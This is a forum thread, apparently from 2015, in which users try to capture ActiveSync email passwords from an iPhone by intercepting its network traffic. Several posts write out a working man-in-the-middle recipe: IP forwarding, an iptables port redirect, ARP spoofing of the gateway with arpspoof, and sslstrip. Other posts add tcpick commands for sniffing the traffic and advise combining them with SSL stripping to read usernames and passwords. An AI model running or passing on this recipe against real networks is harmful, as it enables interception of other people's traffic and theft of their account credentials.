Hacking ActiveSync with MITM - possible?

[michael_kent123]

Does anyone know about Microsoft ActiveSync? Link: https://en.wikipedia.org/wiki/Exchange_ActiveSync

Basically, it is the way in which iPhone users setup their Hotmail / Outlook account. You just enter the e-mail and password and ActiveSync checks that the information is correct. You don't need to enter the POP or IMAP or SMTP details.

Now, ActiveSync uses port 443 to transmit data. I thought that the username and password could be intercepted and recorded with SSL Strip. This is because the data is transmitted to the Microsoft server using HTTPS which is exactly what SSL Strip compromises when used on websites.

Here is how I setup SSL Strip. I know for a fact that this works as I tested it by logging in to e-mail sites on the iPhone.

echo "1" > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

arpspoof -i wlan1 gateway_ip

sslstrip -l 10000 -k

I then sent an e-mail from a different device to the iPhone. I used Wireshark which showed that my iPhone's IP transmitted some HTTPS traffic. I assume that it logged into Microsoft servers to access the message. At this point, I am guessing that the username and password was sent to allow me to read the message. Wireshark shows a DNS request to outlook.office365.com and the iPhone's IP contacts an IP in the range 207.46.0.0 - 207.46.255.255 which is owned by Microsoft. This is HTTPS (over TCP) and TLSv1.2 protocols.

There is also a transmission to 132.245.0.0 - 132.245.255.255 which is Microsoft using IMAPS.

However, when I checked the SSL Strip log, nothing was recorded. Obviously, using ActiveSync is not the same as logging into a HTTPS website. But ActiveSync does use HTTPS so I thought that SSL Strip might work. Clearly I was wrong.

Can anyone comment on this? Is there a way to acquire the password from an iPhone when the e-mail account is setup with ActiveSync? As more and more people move from computers to phones, I would have thought this would be an increasingly important attack vector.

Edited July 17, 2015 by michael_kent123

[i8igmac]

maybe sniff the traffic with another tool...

Tcpick -i wlan0 -bPS -C

in a second terminal

Tcpick -i wlan0 -bPC -C

The 2 above will show traffic in separate terminals, one is traffic to the server(Get request) and the other is the server Response...

I like this tool as its quick clean and uses the same filter syntax as wireshark... check and see if port 80 was used and what this data looks like...

[digip]

maybe sniff the traffic with another tool...

Tcpick

I'll have to look into that tool when I have some time to play. Never heard of it, nice post.

[michael_kent123]

maybe sniff the traffic with another tool...

Tcpick -i wlan0 -bPS -C

in a second terminal

Tcpick -i wlan0 -bPC -C

Sourceforge is down atm but I'll look into this.

How does it sniff / intercept / overcome SSL communications?

[digip]

Sourceforge is down atm but I'll look into this.

How does it sniff / intercept / overcome SSL communications?

I don't beleive it does anything to overcome SSL. It merely lets you look at the request sent and the repsonses, so if it were say, http vs https, you would see port 80 and all the info associated with it, vs SSL, which would show encrypted traffic. However, combine this sniffing with another tool to strip off the SSL and you should then be able to easily see what you want in these two terminals, such as passwords, usernames, etc.

Try http://sourceforge.net/projects/tcpick/?source=directory instead of the first google search result, which I think is a bad link or possibly the author hasn't fixed their uploaded internal hosted home page.

[i8igmac]

Sourceforge is down atm but I'll look into this.

How does it sniff / intercept / overcome SSL communications?

apt-get install tcpick

This tool is alot like tcpdump or wireshark... tcpick will show you raw traffic that is passing threw your wlan/eth adapter... it can display great color and syntax, programmers will enjoy the lightweight look and feel...

if your trying to understand how this ssl strip process works then you need to watch the traffic as you perform your attack...

so... at this point... did you watch port 80?

tcpick -I wlan0 -bPS -C "port 80"

this will show all traffic going out to a server...

(GET /index.php HTTP/1.1)

tcpick -I wlan0 -bPC -C "port 80"

This will show all traffic coming back to you the client...

(HTTP/1.1 304 Not modified)

did the traffic even make it to port 80

[michael_kent123]

I finally tried tcpick but had no success. Here is what I did.

Terminal 1:

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
arpspoof -i wlan0 192.168.1.1 [router IP]

Terminal 2:

sslstrip -l 10000 -k

Terminal 3:

sudo tcpick -i wlan0 -bPS -C "port 443"

Terminal 4:

sudo tcpick -i wlan0 -bPC -C "port 443"

I then sent an e-mail from a different device to a Hotmail address which was setup on my iPhone with ActiveSync.

Tcpick showed HTTPS connections to Microsoft but did not collect any username:password combinations (neither did sslstrip.log).

The tcpick server shows content like:

...r......Y.t~swj......t..J...$.#.
.k.g.9.3...=.<.5./...&.%.......*.).....
...............C.........bay405-m.hotmail.com.
.................
..........3t..
....f...ba..L!g..Q*..fA '. +........7............x..[q..Z.J...}K........
\...%S2F..q.*X..._.T}v{......|FE..
......

The tcpick client just showed connections to Microsoft's IP addresses.

For example:

SYN-SENT 192.168.1.10:51999 > 207.46.11.152:https
SYN-SENT 192.168.1.10:53999 > 207.46.11.152:https
RESET 192.168.1.10:51999 > 207.46.11.152:https
RESET 192.168.1.10:51999 > 207.46.11.152:https

I also tried using tcpick -i wlan0 -bPC -C "port 80" and tcpick -i wlan0 -bPS -C "port 80" (as i8igmac suggested). However, no data was shown. Just IP addresses.

Any ideas? Thanks.